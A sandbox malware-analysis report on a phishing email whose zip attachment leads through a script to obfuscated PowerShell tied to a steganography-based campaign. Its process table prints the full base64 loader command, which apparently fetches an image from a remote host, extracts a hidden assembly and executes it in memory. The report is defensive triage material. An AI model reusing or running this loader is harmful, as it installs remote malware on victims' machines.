File name:

backup-message-10.7.95.146_9045-23037934.eml

Full analysis: https://app.any.run/tasks/f0beb7ba-2c1c-4278-bfcb-2c51afc50a42
Verdict: Malicious activity
Analysis date: March 25, 2025, 05:06:50
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
attachments
attc-arch
arch-scr
stegocampaign
Indicators:
MIME: message/rfc822
File info: RFC 822 mail, ASCII text, with CRLF line terminators
MD5:

AF4D3D636CAD4FFE92EFD22317B23C3B

SHA1:

0AB565CBE5DC5968AB267F1EB539E5473D452A88

SHA256:

FC7F6403A90D5C61408CC4D19DCF47E064B5BAF13DA9C1280D6FBFC3373B67B5

SSDEEP:

1536:mHx2hTEWp+MbhhwOA/X+70+vIj9YGnuW+CLVaTVg3PfF0o:mR2r+MA/Y0+vIxFnb+CVaTVg3n+o

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Generic archive extractor

      • OUTLOOK.EXE (PID: 6728)
    • STEGOCAMPAIGN has been detected

      • powershell.exe (PID: 1300)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 1300)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • WinRAR.exe (PID: 1312)
      • ShellExperienceHost.exe (PID: 6676)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 8180)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 8180)
    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 8180)
    • Base64-obfuscated command line is found

      • wscript.exe (PID: 8180)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1300)
    • The process executes JS scripts

      • WinRAR.exe (PID: 1312)
    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 8180)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 8180)
  • INFO

    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 7736)
    • Checks proxy server information

      • BackgroundTransferHost.exe (PID: 7736)
      • powershell.exe (PID: 1300)
      • slui.exe (PID: 7704)
    • Reads Microsoft Office registry keys

      • WinRAR.exe (PID: 1312)
    • Reads the software policy settings

      • BackgroundTransferHost.exe (PID: 7736)
      • slui.exe (PID: 7632)
      • slui.exe (PID: 7704)
    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 7736)
      • BackgroundTransferHost.exe (PID: 4608)
      • BackgroundTransferHost.exe (PID: 1328)
      • BackgroundTransferHost.exe (PID: 1228)
      • BackgroundTransferHost.exe (PID: 7916)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1300)
    • Remote server returned an error (POWERSHELL)

      • powershell.exe (PID: 1300)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1300)
    • Reads the computer name

      • ShellExperienceHost.exe (PID: 6676)
      • identity_helper.exe (PID: 8168)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1300)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 1300)
    • Disables trace logs

      • powershell.exe (PID: 1300)
    • Manual execution by a user

      • msedge.exe (PID: 6272)
    • Checks supported languages

      • ShellExperienceHost.exe (PID: 6676)
      • identity_helper.exe (PID: 8168)
    • Reads Environment values

      • identity_helper.exe (PID: 8168)
    • Application launched itself

      • msedge.exe (PID: 6272)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.eml | E-Mail message (Var. 5) (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
217
Monitored processes
72
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start outlook.exe sppextcomobj.exe no specs slui.exe ai.exe no specs backgroundtransferhost.exe no specs winrar.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs wscript.exe no specs #STEGOCAMPAIGN powershell.exe conhost.exe no specs backgroundtransferhost.exe no specs slui.exe shellexperiencehost.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
208"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=7540 --field-trial-handle=2320,i,12379578870064990212,839138506415021098,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
516"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=7264 --field-trial-handle=2320,i,12379578870064990212,839138506415021098,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
632"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2304 --field-trial-handle=2320,i,12379578870064990212,839138506415021098,262144 --variations-seed-version /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1228"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
1272"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5848 --field-trial-handle=2320,i,12379578870064990212,839138506415021098,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1300"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JpaginatedBmpaginatedGkpaginatedbgBnpaginatedGUpaginatedcgBipaginatedG8paginateddwBspaginatedHMpaginatedIpaginatedpaginated9paginatedCpaginatedpaginatedJwpaginatedjpaginatedHgpaginatedIwpaginatedupaginatedGUpaginatedbpaginatedBppaginatedEYpaginatedZpaginatedBlpaginatedCMpaginatedcgBlpaginatedHYpaginatedbgBvpaginatedEMpaginatedLwBtpaginatedG8paginatedYwpaginatedupaginatedHMpaginatedIwBupaginatedGUpaginatedbQpaginatedjpaginatedGkpaginateddQBypaginatedGMpaginatedZQBypaginatedCMpaginatedbgBlpaginatedGwpaginatedYQpaginatedjpaginatedC8paginatedLwpaginated6paginatedHMpaginatedcpaginatedpaginatedjpaginatedCMpaginatedapaginatedpaginatednpaginatedDspaginatedJpaginatedBwpaginatedGEpaginatedcgBhpaginatedHMpaginatedYQBspaginatedHpaginatedpaginatedaQBupaginatedGcpaginatedaQB0paginatedGkpaginatedcwpaginatedgpaginatedD0paginatedIpaginatedpaginatedkpaginatedGYpaginatedaQBupaginatedGcpaginatedZQBypaginatedGIpaginatedbwB3paginatedGwpaginatedcwpaginatedgpaginatedC0paginatedcgBlpaginatedHpaginatedpaginatedbpaginatedBhpaginatedGMpaginatedZQpaginatedgpaginatedCcpaginatedIwpaginatednpaginatedCwpaginatedIpaginatedpaginatednpaginatedHQpaginatedJwpaginated7paginatedCQpaginatedaQBupaginatedHQpaginatedZQBypaginatedHMpaginatedcpaginatedBlpaginatedHIpaginatedcwBhpaginatedGwpaginatedIpaginatedpaginated9paginatedCpaginatedpaginatedJwBopaginatedHQpaginateddpaginatedBwpaginatedHMpaginatedOgpaginatedvpaginatedC8paginatedaQBhpaginatedDYpaginatedMpaginatedpaginatedwpaginatedDIpaginatedMpaginatedpaginated0paginatedC4paginateddQBzpaginatedC4paginatedYQBypaginatedGMpaginatedapaginatedBppaginatedHYpaginatedZQpaginatedupaginatedG8paginatedcgBnpaginatedC8paginatedMgpaginated1paginatedC8paginatedaQB0paginatedGUpaginatedbQBzpaginatedC8paginatedbgBlpaginatedHcpaginatedXwBppaginatedG0paginatedYQBnpaginatedGUpaginatedXwpaginatedypaginatedDpaginatedpaginatedMgpaginated1paginatedDpaginatedpaginatedMwpaginatedxpaginatedDgpaginatedLwBupaginatedGUpaginateddwBfpaginatedGkpaginatedbQBhpaginatedGcpaginatedZQpaginatedupaginatedGopaginatedcpaginatedBnpaginatedCcpaginatedOwpaginatedkpaginatedGgpaginatedYQB0paginatedGkpaginatedbgBnpaginatedCpaginatedpaginatedPQpaginatedgpaginatedE4paginatedZQB3paginatedC0paginatedTwBipaginatedGopaginatedZQBjpaginatedHQpaginatedIpaginatedBTpaginatedHkpaginatedcwB0paginatedGUpaginatedbQpaginatedupaginatedE4paginatedZQB0paginatedC4paginatedVwBlpaginatedGIpaginatedQwBspaginatedGkpaginatedZQBupaginatedHQpaginatedOwpaginatedkpaginatedG8paginatedepaginatedB5paginatedGEpaginatedcgB5paginatedGwpaginatedYQB0paginatedGkpaginatedbwBupaginatedCpaginatedpaginatedPQpaginatedgpaginatedCQpaginatedapaginatedBhpaginatedHQpaginatedaQBupaginatedGcpaginatedLgBEpaginatedG8paginateddwBupaginatedGwpaginatedbwBhpaginatedGQpaginatedRpaginatedBhpaginatedHQpaginatedYQpaginatedopaginatedCQpaginatedaQBupaginatedHQpaginatedZQBypaginatedHMpaginatedcpaginatedBlpaginatedHIpaginatedcwBhpaginatedGwpaginatedKQpaginated7paginatedCQpaginatedZQB2paginatedGkpaginateddpaginatedBhpaginatedGIpaginatedaQBspaginatedGkpaginateddpaginatedB5paginatedCpaginatedpaginatedPQpaginatedgpaginatedFspaginatedUwB5paginatedHMpaginateddpaginatedBlpaginatedG0paginatedLgBUpaginatedGUpaginatedepaginatedB0paginatedC4paginatedRQBupaginatedGMpaginatedbwBkpaginatedGkpaginatedbgBnpaginatedF0paginatedOgpaginated6paginatedFUpaginatedVpaginatedBGpaginatedDgpaginatedLgBHpaginatedGUpaginateddpaginatedBTpaginatedHQpaginatedcgBppaginatedG4paginatedZwpaginatedopaginatedCQpaginatedbwB4paginatedHkpaginatedYQBypaginatedHkpaginatedbpaginatedBhpaginatedHQpaginatedaQBvpaginatedG4paginatedKQpaginated7paginatedCQpaginateddgBspaginatedGEpaginatedZpaginatedBppaginatedGspaginatedYQpaginatedgpaginatedD0paginatedIpaginatedpaginatednpaginatedDwpaginatedPpaginatedBCpaginatedEEpaginatedUwBFpaginatedDYpaginatedNpaginatedBfpaginatedFMpaginatedVpaginatedBBpaginatedFIpaginatedVpaginatedpaginated+paginatedD4paginatedJwpaginated7paginatedCQpaginateddpaginatedBypaginatedGUpaginatedYQBkpaginatedGUpaginatedZpaginatedpaginatedgpaginatedD0paginatedIpaginatedpaginatednpaginatedDwpaginatedPpaginatedBCpaginatedEEpaginatedUwBFpaginatedDYpaginatedNpaginatedBfpaginatedEUpaginatedTgBEpaginatedD4paginatedPgpaginatednpaginatedDspaginatedJpaginatedB0paginatedGEpaginatedYwB0paginatedGwpaginatedZQBzpaginatedHMpaginatedbgBlpaginatedHMpaginatedcwpaginatedgpaginatedD0paginatedIpaginatedpaginatedkpaginatedGUpaginateddgBppaginatedHQpaginatedYQBipaginatedGkpaginatedbpaginatedBppaginatedHQpaginatedeQpaginatedupaginatedEkpaginatedbgBkpaginatedGUpaginatedepaginatedBPpaginatedGYpaginatedKpaginatedpaginatedkpaginatedHYpaginatedbpaginatedBhpaginatedGQpaginatedaQBrpaginatedGEpaginatedKQpaginated7paginatedCQpaginatedYwBvpaginatedHUpaginatedbgB0paginatedGUpaginatedcgBipaginatedGEpaginatedbpaginatedBhpaginatedG4paginatedYwBlpaginatedCpaginatedpaginatedPQpaginatedgpaginatedCQpaginatedZQB2paginatedGkpaginateddpaginatedBhpaginatedGIpaginatedaQBspaginatedGkpaginateddpaginatedB5paginatedC4paginatedSQBupaginatedGQpaginatedZQB4paginatedE8paginatedZgpaginatedopaginatedCQpaginateddpaginatedBypaginatedGUpaginatedYQBkpaginatedGUpaginatedZpaginatedpaginatedppaginatedDspaginatedJpaginatedB0paginatedGEpaginatedYwB0paginatedGwpaginatedZQBzpaginatedHMpaginatedbgBlpaginatedHMpaginatedcwpaginatedgpaginatedC0paginatedZwBlpaginatedCpaginatedpaginatedMpaginatedpaginatedgpaginatedC0paginatedYQBupaginatedGQpaginatedIpaginatedpaginatedkpaginatedGMpaginatedbwB1paginatedG4paginateddpaginatedBlpaginatedHIpaginatedYgBhpaginatedGwpaginatedYQBupaginatedGMpaginatedZQpaginatedgpaginatedC0paginatedZwB0paginatedCpaginatedpaginatedJpaginatedB0paginatedGEpaginatedYwB0paginatedGwpaginatedZQBzpaginatedHMpaginatedbgBlpaginatedHMpaginatedcwpaginated7paginatedCQpaginateddpaginatedBhpaginatedGMpaginateddpaginatedBspaginatedGUpaginatedcwBzpaginatedG4paginatedZQBzpaginatedHMpaginatedIpaginatedpaginatedrpaginatedD0paginatedIpaginatedpaginatedkpaginatedHYpaginatedbpaginatedBhpaginatedGQpaginatedaQBrpaginatedGEpaginatedLgBMpaginatedGUpaginatedbgBnpaginatedHQpaginatedapaginatedpaginated7paginatedCQpaginatedapaginatedBvpaginatedGwpaginatedbwBzpaginatedHQpaginatedZQB1paginatedG0paginatedIpaginatedpaginated9paginatedCpaginatedpaginatedJpaginatedBjpaginatedG8paginateddQBupaginatedHQpaginatedZQBypaginatedGIpaginatedYQBspaginatedGEpaginatedbgBjpaginatedGUpaginatedIpaginatedpaginatedtpaginatedCpaginatedpaginatedJpaginatedB0paginatedGEpaginatedYwB0paginatedGwpaginatedZQBzpaginatedHMpaginatedbgBlpaginatedHMpaginatedcwpaginated7paginatedCQpaginatedcpaginatedBypaginatedG8paginatedcpaginatedBlpaginatedGQpaginatedZQB1paginatedHQpaginatedaQBjpaginatedCpaginatedpaginatedPQpaginatedgpaginatedCQpaginatedZQB2paginatedGkpaginateddpaginatedBhpaginatedGIpaginatedaQBspaginatedGkpaginateddpaginatedB5paginatedC4paginatedUwB1paginatedGIpaginatedcwB0paginatedHIpaginatedaQBupaginatedGcpaginatedKpaginatedpaginatedkpaginatedHQpaginatedYQBjpaginatedHQpaginatedbpaginatedBlpaginatedHMpaginatedcwBupaginatedGUpaginatedcwBzpaginatedCwpaginatedIpaginatedpaginatedkpaginatedGgpaginatedbwBspaginatedG8paginatedcwB0paginatedGUpaginateddQBtpaginatedCkpaginatedOwpaginatedkpaginatedGIpaginatedaQBypaginatedGQpaginatedbpaginatedBppaginatedG4paginatedZwpaginatedgpaginatedD0paginatedIpaginatedBbpaginatedFMpaginatedeQBzpaginatedHQpaginatedZQBtpaginatedC4paginatedQwBvpaginatedG4paginateddgBlpaginatedHIpaginateddpaginatedBdpaginatedDopaginatedOgBGpaginatedHIpaginatedbwBtpaginatedEIpaginatedYQBzpaginatedGUpaginatedNgpaginated0paginatedFMpaginateddpaginatedBypaginatedGkpaginatedbgBnpaginatedCgpaginatedJpaginatedBwpaginatedHIpaginatedbwBwpaginatedGUpaginatedZpaginatedBlpaginatedHUpaginateddpaginatedBppaginatedGMpaginatedKQpaginated7paginatedCQpaginatedYwB5paginatedGMpaginatedbpaginatedBvpaginatedGgpaginatedZQB4paginatedGUpaginatedbgBvpaginatedG4paginatedZQpaginatedgpaginatedD0paginatedIpaginatedBbpaginatedFMpaginatedeQBzpaginatedHQpaginatedZQBtpaginatedC4paginatedUgBlpaginatedGYpaginatedbpaginatedBlpaginatedGMpaginateddpaginatedBppaginatedG8paginatedbgpaginatedupaginatedEEpaginatedcwBzpaginatedGUpaginatedbQBipaginatedGwpaginatedeQBdpaginatedDopaginatedOgBMpaginatedG8paginatedYQBkpaginatedCgpaginatedJpaginatedBipaginatedGkpaginatedcgBkpaginatedGwpaginatedaQBupaginatedGcpaginatedKQpaginated7paginatedCQpaginatedZQBwpaginatedGkpaginateddpaginatedBvpaginatedHgpaginatedbwBppaginatedGQpaginatedIpaginatedpaginated9paginatedCpaginatedpaginatedWwBkpaginatedG4paginatedbpaginatedBppaginatedGIpaginatedLgBJpaginatedE8paginatedLgBIpaginatedG8paginatedbQBlpaginatedF0paginatedLgBHpaginatedGUpaginateddpaginatedBNpaginatedGUpaginateddpaginatedBopaginatedG8paginatedZpaginatedpaginatedopaginatedCcpaginatedVgBBpaginatedEkpaginatedJwpaginatedppaginatedC4paginatedSQBupaginatedHYpaginatedbwBrpaginatedGUpaginatedKpaginatedpaginatedkpaginatedG4paginateddQBspaginatedGwpaginatedLpaginatedpaginatedgpaginatedFspaginatedbwBipaginatedGopaginatedZQBjpaginatedHQpaginatedWwBdpaginatedF0paginatedIpaginatedBpaginatedpaginatedCgpaginatedJpaginatedBwpaginatedGEpaginatedcgBhpaginatedHMpaginatedYQBspaginatedHpaginatedpaginatedaQBupaginatedGcpaginatedaQB0paginatedGkpaginatedcwpaginatedspaginatedCcpaginatedJwpaginatedspaginatedCcpaginatedJwpaginatedspaginatedCcpaginatedJwpaginatedspaginatedCcpaginatedQwBhpaginatedHMpaginatedUpaginatedBvpaginatedGwpaginatedJwpaginatedspaginatedCcpaginatedJwpaginatedspaginatedCcpaginatedJwpaginatedspaginatedCcpaginatedJwpaginatedspaginatedCcpaginatedJwpaginatedspaginatedCcpaginatedJwpaginatedspaginatedCcpaginatedJwpaginatedspaginatedCcpaginatedJwpaginatedspaginatedCcpaginatedJwpaginatedspaginatedCcpaginatedJwpaginatedspaginatedCcpaginatedJwpaginatedspaginatedCcpaginatedMgpaginatednpaginatedCkpaginatedKQpaginated='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('paginated','A'))); Invoke-Expression $OWjuxd""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1312"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UJHPLG52\RemittanceVO23081100084673.zip"C:\Program Files\WinRAR\WinRAR.exeOUTLOOK.EXE
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1328"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
1388"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2576 --field-trial-handle=2320,i,12379578870064990212,839138506415021098,262144 --variations-seed-version /prefetch:3C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1660"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=7360 --field-trial-handle=2320,i,12379578870064990212,839138506415021098,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
28 565
Read events
27 230
Write events
1 164
Delete events
171

Modification events

(PID) Process:(6728) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:6
Value:
01941A000000001000B24E9A3E06000000000000000600000000000000
(PID) Process:(6728) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\OUTLOOK\6728
Operation:writeName:0
Value:
0B0E1099C022ECF96B0740ACD0B9BC83E58F12230046A7B9C1E9BBA8E7ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511C834D2120B6F00750074006C006F006F006B002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(6728) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics
Operation:delete valueName:BootCommand
Value:
(PID) Process:(6728) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics
Operation:delete valueName:BootFailureCount
Value:
(PID) Process:(6728) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics\BootDiagnosticsDataPreviousSession
Operation:delete keyName:(default)
Value:
(PID) Process:(6728) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics\BootDiagnosticsDataPreviousSession
Operation:writeName:CantBootResolution
Value:
BootSuccess
(PID) Process:(6728) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics\BootDiagnosticsDataPreviousSession
Operation:writeName:ProfileBeingOpened
Value:
Outlook
(PID) Process:(6728) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics\BootDiagnosticsDataPreviousSession
Operation:writeName:SessionId
Value:
C3D8E96E-C1AF-4750-8D52-F4E28119C131
(PID) Process:(6728) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics\BootDiagnosticsDataPreviousSession
Operation:writeName:BootDiagnosticsLogFile
Value:
C:\Users\admin\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16026_20146-20240718T1116060318-1644.etl
(PID) Process:(6728) OUTLOOK.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Diagnostics
Operation:delete valueName:ProfileBeingOpened
Value:
Executable files
12
Suspicious files
664
Text files
134
Unknown types
0

Dropped files

PID
Process
Filename
Type
6728OUTLOOK.EXEC:\Users\admin\Documents\Outlook Files\Outlook1.pst
MD5:
SHA256:
7736BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\7df4ab60-36ff-44ca-aba5-f0e60b96f17a.down_data
MD5:
SHA256:
6728OUTLOOK.EXEC:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\7C93B7BF-FECD-4D88-9D2E-5C115C5A3424xml
MD5:7F4B714F628526A6882FFDD1B7AF7F36
SHA256:BDC025491EF277E08CFC30F4CBECB191EEDBB455D86C012846E63BB0FD6A5843
6728OUTLOOK.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotmbinary
MD5:09D8C98616658A7BE52029269F232210
SHA256:779A3074E2567A284DEB3323341AFDD95ED3607D5B1A2C286B8BA2096BB443E4
6728OUTLOOK.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04binary
MD5:0BBEDBE65D529A83D458D6526145E2AD
SHA256:F5E7FDED7887B5235D7A33796629D2A057CAED455093A0D8ADAD0E9E2B2FE3D6
